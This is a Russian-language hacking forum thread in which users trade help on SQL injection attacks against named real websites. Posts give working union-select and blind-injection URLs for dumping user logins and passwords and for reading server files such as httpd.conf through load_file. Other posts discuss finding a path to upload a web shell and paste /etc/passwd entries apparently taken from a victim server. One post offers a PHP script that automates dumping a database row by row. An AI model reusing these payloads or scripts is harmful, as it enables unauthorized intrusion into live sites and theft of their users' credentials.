Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    вопрос по limit

    ни как не пойму, если сливать базу через скуль-инъекцию через limit то сливает от силы 20-30К, если же через where+id= то тянешь всю базу на 200-300К. почему limit выводит лишь часть?
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Это не куки тянут, а код кликандера поставили(реклама).
     
  3. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Тебе сюда
     
  4. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    посоветуйте программу или скрипт для слива бд. Чтоб прога сливала через where+id

    http://site.ru/news.php?id=1+union+select+1,2,name,4+from+users+where+id={index}--

    а не через limit.
     
  5. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Подскажите, можно ли залить шелл?

    http://www.skyalbum.com/showAlbum/-223451+union+select+1,2,3,4,5,6,concat%28user%28%29,0x3a,user,0x3a,password,0x3a,File_Priv,0x3a,Load_File%28%27/etc/httpd/conf/httpd.conf%27%29%29,8,9,10,11,12,13,14,15+from+mysql.user--

    Заранее благодарю...
     
  6. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.skyalbum.com/showAlbum/-223451+union+select+1,2,3,4,5,6,file_priv,8,9,10,11,12,13,14,15+from+mysql.user+where+user='skyalbum_db_user'--
    да можно залить...
     
  7. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Спасибо, но что файл прив есть я знаю, мне интересно другое, мне нужно найти полный путь, но чет не получается, может он указан в каком-нить конфиге?
     
  8. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    /etc/passwd читай, там все есть
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    /etc/httpd/conf/httpd.conf
    /usr/apache/httpd.conf

    и так далее и тому подобное..тебе эти файлы о чем нибудь говорят ? в /etc/passwd очень редко путь абсолютный я находил..
     
  10. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет:
    Code:
    flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:[B]/var/www/flash.dvd-photo-slideshow.com[/B]:/sbin/nologin
    jp.flash-slideshow-maker.com:x:503:48::[B]/var/www/jp.flash-slideshow-maker.com[/B]:/sbin/nologin
    m4p-mp3.tuneclone.com:x:504:48::[B]/var/www/m4p-mp3.tuneclone.com[/B]:/sbin/nologin
    skyalbum.com:x:505:48::[B]/var/www/skyalbum.com[/B]:/sbin/nologin
    
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    придержи-ка свой язык..ты шелл залей по этому пути, потом вякай..
     
    2 people like this.
  12. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет

    что ж ты нервный-то такой
     
  13. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Не спорьте с Gorev. Он прав. И прекращайте флудить.
     
    #15393 Фараон, 17 Nov 2010
    Last edited: 17 Nov 2010
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Не всегда.
     
    1 person likes this.
  15. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    можно такой примитив заюзать например
    PHP:
    function ololo($url,$proxy='127.0.0.1')
    {
    $ch=curl_init($url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
    curl_setopt($ch,CURLOPT_PROXY,$proxy);
    $content=curl_exec($ch);
    curl_close($ch);
    return 
    $content;
    }
    $num='1000'// максимальный id
    $regex='~<title>(.*?)</title>~'//ну ты понел
    $f=fopen('db','a+');
    for(
    $i=0;$i<$num;$i++)
    {
        
    preg_match($regex,ololo("http://microsoft.com/billi.php?id=-1+union+select+concat_ws(0x3a,login,pass),2,3+from+billies_monkeys+where+id=$i--"),$m);
        
    fwrite($f,$m[1]."\n");
    }
    fclose($f);
    не тестил, но должно работать вроде как..
     
    1 person likes this.
  16. lostelacoste

    lostelacoste New Member

    Joined:
    27 Oct 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    http://www.bookmg.ru/news/post/id.15'
    можно ли раскрутить?
     
  17. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    как слепую точно можно:
    true:
    http://www.bookmg.ru/news/post/id.15+and+1=1
    http://www.bookmg.ru/news/post/id.15+and+substring(@@version,1,1)='M'
    http://www.bookmg.ru/news/post/id.15+and+(select+system_user)='sa'
    false:
    http://www.bookmg.ru/news/post/id.15+and+1=0
     
  18. Hideofangel

    Hideofangel Banned

    Joined:
    2 Sep 2010
    Messages:
    11
    Likes Received:
    2
    Reputations:
    2
    Мог бы кто не будь рассказать или дать ссылки на русское описание по использованию(или видео) JBroFuzz?
    Был бы весьма признателен.
    P.S.Видео от создателей видел(OWASP),но может есть от наших умельцев.
     
  19. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Code:
    http://www.bookmg.ru/news/post/id.-15 union all select @@version,null,null,null,null--
     
    2 people like this.
  20. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    используя такую конструкцию пытаюсь извлечь пассы
    union select password,2,3,4,5,6,7,8,9,10 from users --
    выводит 1 пасс
    групконкат не работает
    union select password,2,3,4,5,6,7,8,9,10 from users limit 1 --
    выводит тот же пасс
    union select password,2,3,4,5,6,7,8,9,10 from users limit 2 --
    выводит тот же пасс
    union select password,2,3,4,5,6,7,8,9,10 from users limit 1,0 --
    union select password,2,3,4,5,6,7,8,9,10 from users limit 1,1 --
    union select password,2,3,4,5,6,7,8,9,10 from users limit 2,1 --
    ничего не выводит
    почему так может происходить? Как правильно сделать запрос?
     
Thread Status:
Not open for further replies.